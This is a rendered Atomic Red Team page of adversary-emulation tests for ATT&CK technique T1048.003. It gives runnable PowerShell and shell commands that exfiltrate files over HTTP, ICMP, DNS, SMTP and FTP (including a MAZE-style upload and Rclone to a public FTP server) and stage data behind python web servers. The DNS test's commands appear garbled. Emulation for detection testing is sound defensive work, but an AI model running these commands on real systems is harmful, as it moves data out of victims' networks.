T1048.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Description from ATT&CK
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
Atomic Tests
Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337.
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
Supported Platforms: macos,linux,freebsd
auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
Inputs:
None
Run it with these steps!
-
Victim System Configuration:
mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
-
Using Python to establish a one-line HTTP server on victim system:
cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337
-
To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
1
Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
Supported Platforms: windows
auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| input_file | Path to file to be exfiltrated. | path | C:\Windows\System32\notepad.exe |
| ip_address | Destination IP address where the data should be sent. | string | 127.0.0.1 |
Attack Commands: Run with powershell!
1
2
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.
Supported Platforms: freebsd,linux
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
Inputs:
None
Run it with these steps!
-
On the adversary machine run the below command.
tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
-
On the victim machine run the below commands.
xxd -p input_file > encoded_data.hex for data in 1
cat encoded_data.hex
-
Once the data is received, use the below command to recover the data.
cat output_file cut -d "A" -f 2 cut -d " " -f 2 cut -d "." -f 1 sort uniq xxd -p -r
1
Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
Supported Platforms: windows
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| input_file | Path to file to exfiltrate | path | C:\Windows\System32\notepad.exe |
| ip_address | Destination IP address where the data should be sent | string | http://127.0.0.1 |
Attack Commands: Run with powershell!
1
2
3
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
Supported Platforms: windows
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| input_file | Path to file to exfiltrate | path | C:\Windows\System32\notepad.exe |
| sender | The email address of the sender | string | test@corp.com |
| receiver | The email address of the receiver | string | test@corp.com |
| smtp_server | SMTP server to use for email transportation | string | 127.0.0.1 |
Attack Commands: Run with powershell!
1
2
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
Atomic Test #6 - MAZE FTP Upload
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP. Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
Supported Platforms: windows
auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ftp_server | FTP Server address | string | 127.0.0.1 |
| username | Username for FTP server login | string | None |
| password | Password for FTP server login | string | None |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
11
12
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
Cleanup Commands:
1
2
3
4
5
6
7
8
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server. Reference
Supported Platforms: windows
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ftp_server | Your own ftp server | string | ftp.dlptest.com |
| ftp_pass | Your FTP user's password | string | rNrKYTX9g7z3RgJRmxWuGHbeu |
| ftp_user | Your FTP username | string | dlpuser |
| ftp_port | Your FTP's port | integer | 21 |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
Dependencies: Run with powershell!
Description: Check if the exfil package exists
Check Prereq Commands:
1
2
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
Description: Check if rclone zip exists Check Prereq Commands:
1
2
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
Atomic Test #8 - Python3 http.server
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
Supported Platforms: linux
auto_generated_guid: 3ea1f938-f80a-4305-9aa8-431bc4867313
Inputs:
None
Attack Commands: Run with sh!
1
2
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
Atomic Test #9 - Python3 http.server (freebsd)
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
Supported Platforms: freebsd
auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b
Inputs:
None
Attack Commands: Run with sh!
1
2
if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi